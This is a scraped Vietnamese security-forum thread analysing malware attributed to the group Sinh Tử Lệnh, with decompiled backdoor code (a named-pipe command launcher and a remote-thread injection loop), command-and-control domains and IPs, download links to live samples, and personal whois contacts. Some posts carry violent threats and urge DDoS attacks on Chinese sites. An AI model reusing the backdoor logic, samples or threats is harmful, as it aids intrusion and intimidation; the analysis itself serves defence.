Lệnh.

conmale wrote:
. .................................................... 2. VulcanBot trong thời hoạt động trỏ về 7 hosts khác nhau, trong đó có một dynamic host sử dụng dyn dns có tên là: tyuqwer.dyndns.org. Theo cache lưu của nhiều nơi trên Internet, tyuqwer.dyndns.org có IP là 112.78.5.79, một IP thuộc "Công ty Cổ phần Dich vụ dữ liệu Trực tuyến" có văn phòng chính ở Q.3, TPHCM. ........................................................... 4. Domain name: update-adobe.com hiện do đám onlineNIC ở HK, CN quản lý. STL đã dời hầu hết các tên miền quan trọng của họ về registrar này ở CN. Nếu đám tạo VulcanBot này cũng chọn OnlineNIC này để lưu trú như STL thì quả là thú vị ;). PS: Ngân ơi, để anh gởi em thêm vài món khá mới để em RE tiếp cho vui cửa vui nhà ;). 
(2) Bọn này (chắc là STL) hơi buồn cười. Sử dụng tên miền năng động (dynamic system domain -dynamic host) cho một webserver cốt là để có thể thiết lập một webserver với một WAN dynamic IP, khi không có một WAN static IP. Đây cũng là cách để giấu (một cách hiệu quả) vị trí địa lý đặt webserver. Thế mà các bác ấy lại config. "dyndns update (IP) soft" với một IP tĩnh, dù rằng trên soft nói trên cũng có option này. Ngu ngơ quá đi thôi. Chắc phải vào HVA forum đọc thêm vài bài. (4) Trụ sở tại HK (China) của các bác này còn có những chuyện bí mật khác. Hì hì Registrar của cái domain SMARTSHOW.INFO của STL mà TQN mới phát hiện ra cũng là OnlineNIC ]]>
/hvaonline/posts/list/38818.html#238373 /hvaonline/posts/list/38818.html#238373 GMT
RCE đám virus của Sinh Tử Lệnh. http://www.mediafire.com/?xzt7i9i4s9m7juj http://www.mediafire.com/?1vh7qdcf3ccsi81 Password như cũ: malware]]> /hvaonline/posts/list/38818.html#238374 /hvaonline/posts/list/38818.html#238374 GMT RCE đám virus của Sinh Tử Lệnh.

File Exe này STL coder cũng build = VC++ 2010, dùng pure C, không dùng C++ như wbmain.dll, coding style là một, y chang với hardkbd.dll. Nhưng trong file EXE này, ta lại gặp hàm decode quen thuộc của wbmain.dll (1 trong 3 hàm decode của nó):
Điều này chứng tỏ (hỏi hay ngã ha) điều gì ? Dùng chung 1 thư viện hay share code lẫn nhau ? PS: Mấy anh STL giỏi quá, em ngưỡng một thật. Thôi bây giờ thay vì DDOS, hack vào các trang Hải Ngoại, các anh hãy DDOS, hack vào mấy website của bọn Ba tàu đi. Được không mấy anh ??????? Coi như chứng tỏ lòng yêu nước đấy. Dán cái hình STL vào mặt tụi nó, thêm chữ VietNam nữa nha ! À mà quên, hồi đó, lúc EXE này run, em capture network traffic, thấy nó connect tới host này:
http://79.49.2d.static.xlhost.com eNET Inc. 3000 E. Dublin Granville Road Columbus, OH 43231 US Domain Name: XLHOST.COM ------------------------------------------------------------------------ Promote your business to millions of viewers for only $1 a month Learn how you can get an Enhanced Business Listing here for your domain name Learn more at http://www.NetworkSolutions.com/ ------------------------------------------------------------------------ Administrative Contact, Technical Contact: Kharazi, Saeed ski@EE.NET eNET Inc. 3000 East Dublin-Granville Road Columbus, OH 43231 US (614) 794-5971 fax: (614) 794-9016 Record expires on 05-Jan-2021. Record created on 05-Jan-2000. Database last updated on 3-Jun-2011 01:35:13 EDT. Domain servers in listed order: DNS2.EE.NET 206.222.1.2 DNS3.EE.NET 206.222.1.3  
Cha, host này vẫn còn sống à, vừa last update hôm nay luôn. Mấy anh giàu quá, đk host tùm lum hết. PS: Mọi ý kiến trao đổi với tui, các bạn có thể PM hay gởi vào hòm thư: truong.quoc.ngan@gmail.com của mình. Hộp thư Yahoo thì để riêng.]]>
/hvaonline/posts/list/38818.html#238625 /hvaonline/posts/list/38818.html#238625 GMT
RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#238650 /hvaonline/posts/list/38818.html#238650 GMT RCE đám virus của Sinh Tử Lệnh. http://www.mediafire.com/?ldgjlc7z88lambb Password: malware File dropper exe không nhúng 2 dll vào trong resource, chúng cùng DrWatson.exe được nén rồi nhúng hết vào data section. Khi run thì extract ra %Temp%, dùng Zlib để uncompress. Đây là một cách mà STL dùng để qua mặt các AV. File DrWatson.exe là file của STL, không phải file của MS. Nó được dropper .exe extract ra %Temp%\update.tmp dưới dạng zip format, unzip ra (dùng zlib) thành file DrWatson.exe rồi run. Cả hai file này đều được dropper .exe xoá ngay sau khi run. Khối lượng các file cần RCE rất lớn, tui up lên mediafire để mọi người cùng tham gia RCE và phân tích, thảo luận. Tụi STL phải thấy là, không phải cái gì tụi nó làm thì không ai biết hết.]]> /hvaonline/posts/list/38818.html#238665 /hvaonline/posts/list/38818.html#238665 GMT RCE đám virus của Sinh Tử Lệnh. Code:
.code:10001D00 ; DWORD __stdcall StartAddress(LPVOID)
.code:10001D00 StartAddress    proc near               ; DATA XREF: ThreadAProc+23o
.code:10001D00                 push    ebp
.code:10001D01                 mov     ebp, esp
.code:10001D03                 and     esp, 0FFFFFFF8h ; Logical AND
.code:10001D06                 push    ecx
.code:10001D07                 push    esi
.code:10001D08                 mov     esi, ds:Sleep   ; Suspends the execution of the current thread for at least the specified interval.
.code:10001D0E                 mov     edi, edi
.code:10001D0E
.code:10001D10
.code:10001D10 loc_10001D10:                           ; CODE XREF: StartAddress+19j
.code:10001D10                 call    readPipeTokenExec ; Token input from pipeline using delimiter '\09'
.code:10001D10                                         ; in format type|libname|parameter
.code:10001D10
.code:10001D15                 push    100             ; dwMilliseconds
.code:10001D17                 call    esi ; Sleep     ; Indirect Call Near Procedure
.code:10001D17
.code:10001D19                 jmp     short loc_10001D10 ; Jump
.code:10001D19
.code:10001D19 StartAddress    endp
Code:
// Token input from pipeline using delimiter '\09'
// in format type|libname|parameter
int __cdecl readPipeTokenExec()
{
  void *v0; // eax@1
  void *v1; // ebp@1
  int tokenCnt; // edi@4
  wchar_t *aToken; // esi@4
  wchar_t *v4; // eax@8
  const WCHAR v5; // cx@9
  __int16 *v6; // eax@12
  __int16 v7; // cx@13
  char v9; // [sp+10h] [bp-2874h]@1
  int exeType; // [sp+14h] [bp-2870h]@1
  DWORD NumberOfBytesRead; // [sp+18h] [bp-286Ch]@1
  wchar_t *Context; // [sp+1Ch] [bp-2868h]@1
  struct _PROCESS_INFORMATION ProcessInformation; // [sp+20h] [bp-2864h]@1
  struct _STARTUPINFOW StartupInfo; // [sp+30h] [bp-2854h]@1
  const WCHAR LibFileName; // [sp+78h] [bp-280Ch]@1
  char v16; // [sp+7Ah] [bp-280Ah]@1
  __int16 Buffer; // [sp+878h] [bp-200Ch]@1
  char v18; // [sp+87Ah] [bp-200Ah]@1
  __int16 createProcessParam; // [sp+1078h] [bp-180Ch]@1
  char v20; // [sp+107Ah] [bp-180Ah]@1
  WCHAR CommandLine; // [sp+1878h] [bp-100Ch]@1
  char v22; // [sp+187Ah] [bp-100Ah]@1
  unsigned int v23; // [sp+287Ch] [bp-8h]@1

  v23 = (unsigned int)&v9 ^ dword_1001201C;
  Buffer = 0;
  memset(&v18, 0, 0x7FEu);
  LibFileName = 0;
  memset(&v16, 0, 0x7FEu);
  createProcessParam = 0;
  memset(&v20, 0, 0x7FEu);
  CommandLine = 0;
  memset(&v22, 0, 0xFFEu);
  NumberOfBytesRead = 0;
  exeType = 0;
  Context = 0;
  memset(&StartupInfo.lpReserved, 0, 0x40u);
  ProcessInformation.hProcess = 0;
  ProcessInformation.hThread = 0;
  ProcessInformation.dwProcessId = 0;
  ProcessInformation.dwThreadId = 0;
  StartupInfo.cb = 68;
  StartupInfo.dwFlags = 1;
  StartupInfo.wShowWindow = 0;
  v0 = (void *)mCreatePipe((const WCHAR *)dword_NamedPipe);
  v1 = v0;
  if ( v0 != (void *)-1 && ConnectNamedPipe(v0, 0) )
  {
    memset(&Buffer, 0, 2048u);
    memset((void *)&LibFileName, 0, 0x800u);
    memset(&createProcessParam, 0, 0x800u);
    memset(&CommandLine, 0, 0x1000u);
    while ( ReadFile(v1, &Buffer, 0x400u, &NumberOfBytesRead, 0) )
    {
      aToken = wcstok_s((wchar_t *)&Buffer, &Delim, &Context);
      tokenCnt = 0;
      while ( aToken )
      {
        if ( tokenCnt )
        {
          if ( tokenCnt == 1 )
          {
            v4 = aToken;
            do
            {
              v5 = *v4;
              *(wchar_t *)((char *)v4 + (char *)&LibFileName - (char *)aToken) = *v4;
              ++v4;
            }
            while ( v5 );
          }
          else
          {
            if ( tokenCnt == 2 )
            {
              v6 = (__int16 *)aToken;
              do
              {
                v7 = *v6;
                *(__int16 *)((char *)v6 + (char *)&createProcessParam - (char *)aToken) = *v6;
                ++v6;
              }
              while ( v7 );
            }
          }
        }
        else
        {
          exeType = _wtoi(aToken);
        }
        aToken = wcstok_s(0, &Delim, &Context);
        ++tokenCnt;
        Sleep(0);
      }
      switch ( exeType )
      {
        case 1:
          if ( IsExistPEFile(&LibFileName) )
          {
            wrap_vprintf((const char *)L"%s %s", &LibFileName, &createProcessParam);
            CreateProcessW(0, &CommandLine, 0, 0, 0, 0x8000020u, 0, 0, &StartupInfo, &ProcessInformation);
          }
          break;
        case 2:
          if ( isExist_PE_Dll_File(&LibFileName) )
            LoadLibraryW(&LibFileName);
          break;
        case 99:
          goto LABEL_23;
      }
      memset(&Buffer, 0, 0x800u);
      memset((void *)&LibFileName, 0, 0x800u);
      memset(&createProcessParam, 0, 0x800u);
      memset(&CommandLine, 0, 0x1000u);
    }
LABEL_23:
    DisconnectNamedPipe(v1);
  }
  DisconnectNamedPipe(v1);
  if ( v1 )
    CloseHandle(v1);
  return 0;
}
Thread này tạo vòng lặp, đọc namedpipe "\\\\.\\pipe\\NannedPipe" lấy tham số để gọi chạy process mới hoặc load DLL. Mỗi dòng đọc được từ pipeline sẽ được tách thành 3 tokens. Token1: giá trị = 1 ứng với file executable, giá trị = 2 ứng với file DLL. Token2: đường dẫn đến executable hoặc DLL. Token3: parameter để chạy chuơng trình. token được phân tách dùng kí tự '\09' đây có thể là một file che dấu dưới dạng chuơng trình tin cậy, duy trì lâu dài để spawn ra các process mới. Thread thứ 2 làm nhiệm vụ duyệt danh sách process, dùng các kĩ thuật dạng CreateRemoteThread để inject module sang: Code:
int __cdecl ThreadAProc()
{
  DWORD v0; // edi@1
  DWORD v1; // esi@1
  FARPROC IsWow64Process_; // ebx@3
  HMODULE kernelModuleHandle; // eax@3
  HANDLE currentProcess; // eax@4
  int encVersion; // eax@5
  int isWow64; // [sp+Ch] [bp-4h]@3

  v0 = 0;
  v1 = 0;
  if ( hModule )
    sub_10002900();
  decodeBuildFilePath();
  CreateThread(0, 0, StartAddress, 0, 0, 0);
  isWow64 = 0;
  kernelModuleHandle = GetModuleHandleW(L"kernel32");
  IsWow64Process_ = GetProcAddress(kernelModuleHandle, "IsWow64Process");
  if ( IsWow64Process_ )
  {
    currentProcess = GetCurrentProcess();
    ((void (__stdcall *)(HANDLE, int *))IsWow64Process_)(currentProcess, &isWow64);
  }
  encVersion = getEncodedOSVersion();
  if ( !isWow64 )
  {
    if ( encVersion == 4 || encVersion == 6 || encVersion == 7 )
      v0 = sub_100020E0();
    scheJobNtXP20037((void *)v0);
    while ( 1 )
    {
      Sleep(600000u);
      scheJobNtXP20037((void *)v0);
    }
  }
  if ( encVersion == 8 || encVersion == 5 )
  {
    while ( 1 )
    {
      Sleep(600000u);
      v1 = scheJobV8n5(v1);
    }
  }
  return 0;
}
]]>
/hvaonline/posts/list/38818.html#239001 /hvaonline/posts/list/38818.html#239001 GMT
RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#240341 /hvaonline/posts/list/38818.html#240341 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#240347 /hvaonline/posts/list/38818.html#240347 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#240409 /hvaonline/posts/list/38818.html#240409 GMT RCE đám virus của Sinh Tử Lệnh.

TQN wrote:
NannedPipe, Nanned: các bạn có biết nghĩa hay phát âm của ngôn ngữ nào có từ Nanned này không ? Em google hết thì chỉ thấy Google khuyên từ này: Nanning. 
Có lẽ nào là "Named", "NamedPipe" không anh? anyway, chẳng biết gì cả, thấy bài viết của anh hay quá, mỗi tội không đủ trình để tham khảo, mong anh cố gắng viết tiếp.]]>
/hvaonline/posts/list/38818.html#240438 /hvaonline/posts/list/38818.html#240438 GMT
RCE đám virus của Sinh Tử Lệnh. Code:
// Create global pipe name: \\\\.\\pipe\\NannedPipe
// VA: 10001000, file ipripv6.dll
wchar_t* _cdecl CreatePipeName()
{
  void *pMem;

  pMem = malloc(100);
  g_wszPipeName = pMem;
  if ( pMem )
  {
      memset(pMem, 0, 0x64u);
      wstrcpy(g_wszPipeName, L"\\\\.\\pipe\\NannedPipe");
  }
  return &g_wszPipeName;
}
Sao không khai báo constant: g_wszPipeName = L"\\\\.\\pipe\\NannedPipe"; mẹ cho rồi. Bởi vậy em mới nói em mà review code mấy anh thì mấy anh tiêu, bắt viết lại hết nhé. Còn không thì mai mốt gởi cho em cái lib remote inject code, remote load library, mấy cái hàm decode vớ vẫn đấy (vd như hàm dùng string Microsoft xxxx gì đó) cho em để em review, optimize lại cho nhé. Chứ em RCE code tụi anh tới giờ em ngán tới tận cổ rồi, code duplicate, copy & paste lung tung hết. Bỏ giữa chừng thì anh em HVA buồn, mà viết tiếp thì em ngán quá. Hay là mai mốt tìm đâu được code rootkit đỉnh một chút thì gởi em nhé. PS: Lúc trước em có gặp thằng GoogleCrashHandler.exe mà theo CMC thì là bot vào VietNamNet, so ra thì code C++của thằng GoogleCrashHandler này cao thủ hơn code của anh em STL này nhiều. Tìm thằng đó mà học hỏi đi nhé ! ]]>
/hvaonline/posts/list/38818.html#240439 /hvaonline/posts/list/38818.html#240439 GMT
RCE đám virus của Sinh Tử Lệnh. Khoe một chút: Thấy font và color của OllyDbg em đang dùng đẹp không. Font: Raize, color: Alex Black.  Đọc mà chỉ buồn cưới =)) ]]> /hvaonline/posts/list/38818.html#240726 /hvaonline/posts/list/38818.html#240726 GMT RCE đám virus của Sinh Tử Lệnh.

TQN wrote:
Gởi tụi STL: 1. Tụi mày lớn hơn tao không mà xưng anh với tao ? 2. Tụi mày chơi trò quá bẩn, núp trong bóng tối, chơi trò ăn cắp pass bao nhiêu lâu rồi mà không thấy xấu hổ à. 3. Tụi mày tưởng hù doạ được tao à. Tao chỉ cần biết một thằng ngoài đời của tụi bây là thằng đó mất xác, khỏi đi tìm. 4. Mấy cái pass cho mấy cái forum, mail vớ vẫn ấy, tao PM cho tui bây cũng được, mất cái này tao tạo cái khác, tên tuổi của tao TQN thì dưới bất cứ nick gì vẫn là TQN. 5. Tui mày chơi bẩn, đợi tao đi xa mới dám tấn công à ? 6. Tui mày tưởng vào được cái xxxbank của tao là giỏi à ? Tụi mày vào đó chỉ xem được chi tiết giao dịch rút, chuyển tiền của tao chứ làm chó gì được. Muốn rút tiền của tao à ? Còn lâu, chữ ký, đt, CMND của tao không có thì đố tụi mày rút tiền được. Vậy mà còn nói dóc, vào rồi ra, để đức cho con cháu. Một ngày làm của tao bằng 10 tháng lương của 10 thằng làm ăn lương hèn hạ của tụi mày. Tao sẽ theo vụ này tới cùng, đừng để thằng nào gặp tao ngoài đường nhé, đệ của tao xả chết ráng chịu nhe. Thách cho tụi mày có chính quyền chống lưng, chơi trò rootkit, snip packet của tao ? PS: À quên, mạng của một thằng trong tụi mày cao lắm là 30 chai thôi, nhớ nhé ! 
Hơi sức đâu mà ông anh nóng giận với mấy chuyện cỏn con đó làm gì? Em thì xài cái Token Key cho nên mất user và pass của ngân hàng cũng ko thành vấn đề gì. Cái PC của em thì toàn là thông tin vớ vẩn, thêm cái firewall và cái microsoft essential nên em cũng quan tâm lắm tới mấy cái trò vớ vẩn của bọn nhóc STL. PS: Anh TQN upload ại cho em mấy cái file đó dc ko? Lâu lắm rồi ko tò mò mấy vụ này.. có lẽ em chậm tay hay sao mà MediaFire nó xoá hết rồi...]]>
/hvaonline/posts/list/38818.html#240878 /hvaonline/posts/list/38818.html#240878 GMT
RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#240939 /hvaonline/posts/list/38818.html#240939 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#240962 /hvaonline/posts/list/38818.html#240962 GMT RCE đám virus của Sinh Tử Lệnh.

TQN wrote:
Lúc trước, sau khi tụi STL lấy được pass mail của tui, tụi nó vào Mediafire xoá hết. Sau khi tui lấy lại pass mail, tui đã up lại. Cậu vào đây download: http://www.mediafire.com/?tz745o0f678w8 2 tranvanminh: anh viết toàn bộ buồn cười hay anh khoe nó buồn cười. 
Hì hì, ý tranvanminh (theo anh hiểu) là những bài phân tích của em rất căng thẳng nhưng cũng có những chi tiết rất hài đó thôi chớ chẳng phải bài viết của em buồn cười đâu. @maclaren: bài viết của Xuân Nhi gì đó tràn lan trên mạng nhưng có quá nhiều chi tiết không chính xác. Bài của Xuân Nhi mới nhìn thì giống như đang phê bình STL nhưng thật sự lại là bao che và bào chữa cho STL. Nói tóm lại, đừng phí thời gian "buôn" những chuyện ngồi lê đôi mách trên mạng bởi vì chẳng có gì bảo đảm tính trung thực của nó cả. Tất cả hầu như là nặc danh cho nên muốn nói cái gì lại không được. PS: lần sau đừng nhét những bài "xã hội" vô trong những chủ đề phân tích kỹ thuật nha bồ. Tái phạm tôi khoá account đó.]]>
/hvaonline/posts/list/38818.html#240990 /hvaonline/posts/list/38818.html#240990 GMT
RCE đám virus của Sinh Tử Lệnh.

conmale wrote:

TQN wrote:
Lúc trước, sau khi tụi STL lấy được pass mail của tui, tụi nó vào Mediafire xoá hết. Sau khi tui lấy lại pass mail, tui đã up lại. Cậu vào đây download: http://www.mediafire.com/?tz745o0f678w8 2 tranvanminh: anh viết toàn bộ buồn cười hay anh khoe nó buồn cười. 
Hì hì, ý tranvanminh (theo anh hiểu) là những bài phân tích của em rất căng thẳng nhưng cũng có những chi tiết rất hài đó thôi chớ chẳng phải bài viết của em buồn cười đâu. @maclaren: bài viết của Xuân Nhi gì đó tràn lan trên mạng nhưng có quá nhiều chi tiết không chính xác. Bài của Xuân Nhi mới nhìn thì giống như đang phê bình STL nhưng thật sự lại là bao che và bào chữa cho STL. Nói tóm lại, đừng phí thời gian "buôn" những chuyện ngồi lê đôi mách trên mạng bởi vì chẳng có gì bảo đảm tính trung thực của nó cả. Tất cả hầu như là nặc danh cho nên muốn nói cái gì lại không được. PS: lần sau đừng nhét những bài "xã hội" vô trong những chủ đề phân tích kỹ thuật nha bồ. Tái phạm tôi khoá account đó. 
à không ! tại vụ STL này mình không biết ? thấy 1 số thông tin hơi củ trên mạng ! mà lại thấy các bác HVA nhà mình đang khuấy nó lên nên cũng tò mò ! định đưa thông tin đó các bác xem thôi ! chứ không có ý gì cả ? - cho mình hỏi ! theo thông tin trên mạng thì nó lâu rồi. hay giờ STL tái xuất mà các bác lại khuấy ra thế ? mình hơi tò mò thôi :D]]>
/hvaonline/posts/list/38818.html#241024 /hvaonline/posts/list/38818.html#241024 GMT
RCE đám virus của Sinh Tử Lệnh.

maclaren wrote:

conmale wrote:

TQN wrote:
Lúc trước, sau khi tụi STL lấy được pass mail của tui, tụi nó vào Mediafire xoá hết. Sau khi tui lấy lại pass mail, tui đã up lại. Cậu vào đây download: http://www.mediafire.com/?tz745o0f678w8 2 tranvanminh: anh viết toàn bộ buồn cười hay anh khoe nó buồn cười. 
Hì hì, ý tranvanminh (theo anh hiểu) là những bài phân tích của em rất căng thẳng nhưng cũng có những chi tiết rất hài đó thôi chớ chẳng phải bài viết của em buồn cười đâu. @maclaren: bài viết của Xuân Nhi gì đó tràn lan trên mạng nhưng có quá nhiều chi tiết không chính xác. Bài của Xuân Nhi mới nhìn thì giống như đang phê bình STL nhưng thật sự lại là bao che và bào chữa cho STL. Nói tóm lại, đừng phí thời gian "buôn" những chuyện ngồi lê đôi mách trên mạng bởi vì chẳng có gì bảo đảm tính trung thực của nó cả. Tất cả hầu như là nặc danh cho nên muốn nói cái gì lại không được. PS: lần sau đừng nhét những bài "xã hội" vô trong những chủ đề phân tích kỹ thuật nha bồ. Tái phạm tôi khoá account đó. 
à không ! tại vụ STL này mình không biết ? thấy 1 số thông tin hơi củ trên mạng ! mà lại thấy các bác HAV nhà mình đang khuấy nó lên nên cũng tò mò ! định đưa thông tin đó các bác xem thôi ! chứ không có ý gì cả ? - cho mình hỏi ! theo thông tin trên mạng thì nó lâu rồi. hay giờ STL tái xuất mà các bác lại khuấy ra thế ? mình hơi tò mò thôi :D 
Lạ thật. Bồ là thành viên từ 2008 nhưng vẫn HVA thành HAV là sao cà? STL chưa bao giờ ngưng hoạt động cho nên không thể "tái xuất".]]>
/hvaonline/posts/list/38818.html#241030 /hvaonline/posts/list/38818.html#241030 GMT
RCE đám virus của Sinh Tử Lệnh. 2 tranvanminh: anh viết toàn bộ buồn cười hay anh khoe nó buồn cười.  Dạ, là như anh conmale trình bày, thấy vui với cách hành văn của anh thôi, chứ không phải nói nội dung kỹ thuật của anh buồn cười (mà thật ra là em hoàn toàn không hiểu về kỹ thuật anh viết ) . Thân mến. ]]> /hvaonline/posts/list/38818.html#241033 /hvaonline/posts/list/38818.html#241033 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#241042 /hvaonline/posts/list/38818.html#241042 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#241081 /hvaonline/posts/list/38818.html#241081 GMT RCE đám virus của Sinh Tử Lệnh.

thaovn wrote:
http://www.domaintools.com/research/whois-history/?q=SMARTSHOW.INFO&page=results&submit=Look+up Các lần change whois info của nó , anh em nào có thẻ tín dụng thì mua cai pro account check giùm sẽ ra chi tiết ! :D 2007 2007-11-05 2008 2008-04-14 2008-04-27 ............. 2010-04-23 2010-11-30 2011 2011-01-22 2011-03-18 2011-04-20 ......... 2011-05-31 
Mua thế nào được cái Pro account. Giá là 10 USD cho 01(một) ngày và chỉ được xem 01(một) domain (whois history) mà thôi. Hì hì To TQN: anh sẽ post lên các thông tin về SMARTSHOW. INFO ( IP, webserver, Location...). Đã có thông tin từ lâu nhưng bận quá (bận cái vụ Hacker VN vs Hacker Tầu) nên chưa post lên được. Sorry]]>
/hvaonline/posts/list/38818.html#241142 /hvaonline/posts/list/38818.html#241142 GMT
RCE đám virus của Sinh Tử Lệnh. THÔNG TIN VỀ DOMAIN SMARTSHOW.INFO VÀ WEBSERVER HOSTING WEBSITE SMARTSHOW.INFO Như các bạn đã biết, anh TQN sau khi disassembling các malicious file của nhóm STL đã phát hiện ra trojan nhúng trong các file này có một service sử dụng để mở một Internet socket kết nối đến một website có tên miền là smartshow.info. Website đóng vai trò tiếp nhận các thông tin mà trojan lấy cắp từ máy nạn nhân, cũng như gửi đến trojan các lệnh (command) mới. Khi anh TQN phát hiện ra smartshow.info thì website này đã không còn active (hiện diện) trên mạng, cho đến nay. Do vậy không thể biết được trước đó website này được hosting trên webserver nào và đặt ở đâu. Tuy nhiên bằng một vài kỹ thuật riêng, kèm với đôi chút kinh nghiêm, chúng tôi đã tìm ra IP của webserver trước đó đã hosting website smartshow.info của nhóm STL, cũng như vị trí đặt webserver này. (Thông tin về webserver chúng tôi tìm ra khoảng nửa ngày sau bài viết công bố tìm thấy tên domain smartshow.info của anh TQN, nhưng giờ mới tiện đăng) A- Trước hết cập nhật thông tin mới của domain smartshow.info Ngày hôm nay 17-6-2011 whois information của domain như sau:
Domain ID:D32531112-LRMS Domain Name:SMARTSHOW.INFO Created On:22-Apr-2010 11:06:53 UTC Last Updated On:02-Jun-2011 03:00:28 UTC Expiration Date:22-Apr-2012 11:06:53 UTC Sponsoring Registrar:OnlineNIC, Inc. (R170-LRMS) Status:CLIENT HOLD Status:CLIENT TRANSFER PROHIBITED Status:PENDING DELETE RESTORABLE Status:HOLD Registrant ID:OLNI_196680_0_0 Registrant Name:Domain ID Shield Service Registrant Organization:Domain ID Shield Service CO., Limited Registrant Street1:1102-1103,11/F,Kowloon Bldg.,555 Nathan Rd.,Mongkok,Kowloon Registrant Street2: Registrant Street3: Registrant City:Hong Kong Registrant State/Province:Hong Kong Registrant Postal Code:999077 Registrant Country:CN 
Những điểm chú ý trong information: 1- Địa chỉ người đăng ký domain là ở Kowloon, Hong công. Ở Hồng công có hai khu là khu Hồng công và Kowloon, như trước đây TP HCM có hai khu là Sài gòn và Chợ lớn. Khu Hong công là trung tâm thương mại, hiện đại, còn Kowloon thì cách Hong công một eo biển, là khu kém phát trển hơn, chủ yếu là sản xuất nhỏ, nông nghiệp và sát với Trung hoa lục địa 2- Domain này mua dịch vụ bảo vệ thông tin, nên một số thông tin trên whois đươc giấu, thí dụ địa chỉ email của người sở hữu domain. 3- Điểm quan trong nhất là domain này dù chưa hết hạn nhưng đang bị registrar đưa vào trang thái: PENDING DELETE RESTORABLE Trang thái (status) này được hiểu là: không đươc cập nhật, thay đổi (update) thông tin của domain trong thời gian tới, ít nhật là trong 40 ngày tới. Sau đó registrar sẽ tiếp tục giữ domain ở trang thai này thêm 30 ngày (và rồi có thể bán lại cho người khác...) B- Webserver đã từng hosting website smartshow.info Webserver này có IP tĩnh là 173.45.73.121, computer name (host name) là 79.49.2d.static.xlhost.com. Công ty xlhost.com quản lý webserver này IP tĩnh nói trên do công ty sau đây quản lý và địa chỉ của nó:
OrgName: eNET Inc. (Tên công ty) Address: 3000 East Dublin Granville Rd. City: Columbus StateProv: OH PostalCode: 43231 Country: US 
Địa chỉ trên đây (Columbus, OH. USA) cũng chính là địa chỉ địa lý đặt webserver đã từng hosting website smartshow.info của nhóm STL (Còn tiếp) ]]>
/hvaonline/posts/list/38818.html#241194 /hvaonline/posts/list/38818.html#241194 GMT
RCE đám virus của Sinh Tử Lệnh. http://www.malwareurl.com/listing.php?domain=ademuwmaytn.com - http://ratite.com/whois/whois.cgi?domain=kardjalinews.com - http://whois.domaintools.com/dochoigiare.com Anh PXM nghĩ sao về những kết quả này ? còn nhiều link em bắt gặp từ Postal Code đến Address Street y hệt - Hôm nay em đọc bài này ở đây : http://www.giaoduc.edu.vn/news/tien-ich-743/hon-200.000-website-mat-tai-khoan-quan-tri-108811.aspx Đề cập đến NeoSploit Toolkit và Trojan Sinowal , liệu đây có phải là hình thức tấn công mà STL dùng ? Em đợi bài tiếp của anh hihi.]]> /hvaonline/posts/list/38818.html#241257 /hvaonline/posts/list/38818.html#241257 GMT RCE đám virus của Sinh Tử Lệnh. -1- và cũng là registrar bị than phiền nhiều nhất từ trước đến giờ. Registrar này hiện đang bị ICANN soi. Có ai còn nhớ vụ registrar registerfly.com không vậy? registerfly.com từng là một registrar rẻ tiền nhất và nổi tiếng nhất nhưng cũng không kém phần... bựa cho nên bị ICANN lột lon và sau một thời gian dãy giụa, registrar này biến mất. -1- OnlineNIC bị phạt 33 triệu đô la vị tội "Cybersquatting" năm 2010. Hiện nay có hàng ngàn người đang phàn nàn OnlineNIC, trong đó có những lawsuits khá lớn.]]> /hvaonline/posts/list/38818.html#241406 /hvaonline/posts/list/38818.html#241406 GMT RCE đám virus của Sinh Tử Lệnh.

TQN wrote:
NannedPipe, Nanned: các bạn có biết nghĩa hay phát âm của ngôn ngữ nào có từ Nanned này không ? Em google hết thì chỉ thấy Google khuyên từ này: Nanning (Nam Ninh - Tàu khựa). 
http://xml.ssdsandbox.net/view/6e24fe89052848420714b947fa890225 Đây là thông tin về 1 con malware mình thấy có những điểm tương tự như con malware trong phân tích của TQN, post lên đây cho mọi người tham khảo

TQN wrote:
À quên, em vẫn có nhu cầu IDA 6.x nhé, bà con nào có share cho em đi. 10 chầu nhậu, em út luôn. PS: Hi rongchaua, lâu quá không gặp. Thấy em vào xem topic này anh vui lắm. Anh em REA. Vào giúp anh một tay đi. Khi nào tụi STL này code malware = .NET thì dành hết cho em nhé ! 
Mình đã gửi cho bro bản DIA 6.1 Pro qua hòm thư xxxxx66[@]hotmail.com rồi đó. PS : nhớ quét virus trước khi sử dụng nhé bro ]]>
/hvaonline/posts/list/38818.html#241854 /hvaonline/posts/list/38818.html#241854 GMT
RCE đám virus của Sinh Tử Lệnh.

conmale wrote:
Từ tháng 4 năm 2008 đến 2010, smartshow.info được georgiy-fedo@yandex.ru đăng ký và sử dụng. Từ 23 tháng 4 năm 2010, được một (người Hoa =)) ) có tên là Zhong Guo Jun đăng ký sử dụng. Search "Zhong Guo Jun" ra khối thứ lý thú ;). Với domain status: PENDING DELETE RESTORABLE thường là domain không renew cho nên bị "delete". Tuy nhiên, chuyện lý thú là domain smartshow.info này được update lần cuối là ngày 2 tháng 6 2011 và domain còn hiệu lực (đã trả tiền) đến 22 tháng 4 năm 2012 lận. Vậy "Status: PENDING DELETE RESTORABLE" là điều bí ẩn :). 
Tổng hợp thông tin về Zhong Guo Jun như sau: Làm việc tại VNVN System Inc ( có thể là người sáng lập ) Địa chỉ: 14902 Moran Street Westminster, CA 92683 US Phone: 714-726-9966 Đây là 1 công ty chuyên về thiết kế web cho cộng đồng người Việt tại US Website chính là vnvn.net Các website liên quan: trungtam.com, vietherald.com, vnvn.net, vncyber.com ( cái này không biết có liên quan đến cái project cybergame trong phân tích của TQN không ) @anh conmale: Trong trường hợp của domain smartshow.info, domain status đầy đủ thì có mấy trường hợp sau : CLIENT HOLD, CLIENT TRANSFER PROHIBITED, HOLD, PENDING DELETE RESTORABLE nên chưa chắc nó đã là PENDING DELETE RESTORABLE]]>
/hvaonline/posts/list/38818.html#241928 /hvaonline/posts/list/38818.html#241928 GMT
RCE đám virus của Sinh Tử Lệnh.

mv1098 wrote:

conmale wrote:
